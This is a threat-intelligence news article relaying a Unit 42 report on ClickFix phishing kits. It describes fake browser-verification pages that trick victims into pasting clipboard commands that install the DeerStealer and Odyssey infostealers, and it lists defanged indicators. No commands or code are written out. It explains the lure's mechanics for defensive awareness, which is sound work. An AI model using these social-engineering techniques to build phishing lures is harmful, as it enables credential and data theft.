ClickFix Phishing: New Automated Kits Trick Users Into Manually Running Malware and Stealers
Ddos 
Researchers from Palo Alto Networks Unit 42 have discovered a new phishing trend where attackers trick victims into manually executing malware on their own devices.
The report exposes a commoditized phishing ecosystem built around an automated tool known as the IUAM ClickFix Generator. This tool makes it simple for threat actors of any skill level to create realistic phishing pages that mimic browser verification challenges from services.
As Unit 42 writes, βAttackers are packaging a highly effective social engineering technique known as ClickFix into easy-to-use phishing kits, making it accessible to a wider range of threat actors. This technique tricks victims into bypassing security measures by manually executing malware, typically information stealers and remote access Trojans (RATs).β
The ClickFix method disguises malicious intent behind what appears to be a normal browser security check. Victims visiting a phishing page are asked to verify that theyβre human β usually by clicking a button that appears to trigger a CAPTCHA or verification process.
Behind the scenes, the click copies a malicious command to the victimβs clipboard. A prompt then instructs them to open a terminal (PowerShell or macOS Terminal), paste the copied command, and execute it βto complete the verification.β
This transforms the user into an unwitting participant in their own infection.
Unit 42 found that attackers are now automating the creation of these pages using the IUAM ClickFix Generator, hosted on a server at IP address 38.242.212[.]5. The kit was observed active from July through October 2025, providing a web interface for building customized phishing campaigns.
The report explains: βThis tool allows threat actors to create highly customizable phishing pages that mimic the challenge-response behavior of a browser verification pageβ¦ The spoofed interface is designed to appear legitimate to victims, increasing the effectiveness of the lure.β
Threat actors can customize nearly every detail β from the title and message (βJust a moment…β) to the command copied to the clipboard and the instructions shown in the fake verification prompt. Advanced options even allow operating system detection, JavaScript obfuscation, and mobile blocking, ensuring victims are guided to desktop environments where the malicious code will execute properly.
Unit 42 researchers identified multiple campaigns built with or inspired by the IUAM ClickFix Generator, each targeting different platforms and distributing distinct malware strains.
Campaign 1: Windows-Only β Delivering DeerStealer
In one case, attackers focused exclusively on Windows systems. βWhen a victim interacts with the CAPTCHA element by clicking a checkbox to determine whether they are human,β Unit 42 explains, βthis action triggers a background JavaScript to copy a malicious PowerShell command to their clipboard. Simultaneously, a popover appears, instructing them to open the Windows Run dialog (by pressing Win+R), paste the content from their clipboard and run the command.β
When executed, the command downloads a malicious batch script (cv.bat) that installs DeerStealer, a credential and browser data theft malware.
The underlying simplicity is what makes ClickFix so effective β it bypasses traditional email filters and endpoint protections because the payload execution occurs manually by the victim, rather than automatically by code exploitation.
Campaign 2: Multi-Platform β Targeting macOS with Odyssey
Another series of phishing campaigns broadened the scope. In this case, attackers configured phishing pages to detect the victimβs operating system via JavaScript and deliver different payloads for Windows and macOS users.
Unit 42 noted, βEach version of the phishing page detects the victimβs operating system via JavaScriptβ¦ and delivers a payload accordingly.β
For macOS users, the pages delivered Odyssey Infostealer, a malware-as-a-service (MaaS) strain known to steal browser data, cryptocurrency wallets, and system credentials. The malicious command was hidden in Base64-encoded form and executed silently using nohup bash, ensuring persistence even if the terminal window closed.
The targeted domains for these campaigns included deceptive names like tradingview.connect-app[.]us[.]com, cloudlare-lndex[.]com, and teamsonsoft[.]com β all designed to look like legitimate web infrastructure or trading platforms.
Unit 42 observed that βsome pages contained leftover developer comments written in Russian,β further hinting at the kitβs likely Eastern European origins.
While Unit 42βs investigation focused on one primary kit, the researchers discovered numerous related variants in circulation, suggesting that the ClickFix model is rapidly proliferating across cybercrime marketplaces.
Related Posts:
- State-Sponsored Actors Adopt ClickFix Technique in Cyber Espionage
- Beware of Fake Google Meet Invites: ClickFix Campaign Spreading Infostealers
- ClickFix: The Rising Threat of Clipboard-Based Social Engineering
- ClickFix Unmasked: How North Koreaβs Kimsuky Group Turned PowerShell into a Weapon of Psychological Deception
- Lazarus APT Targets Job Seekers with “Contagious Interview” Campaign Using ClickFix Technique
Support Our Threat Intelligence
If you find our CVE report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
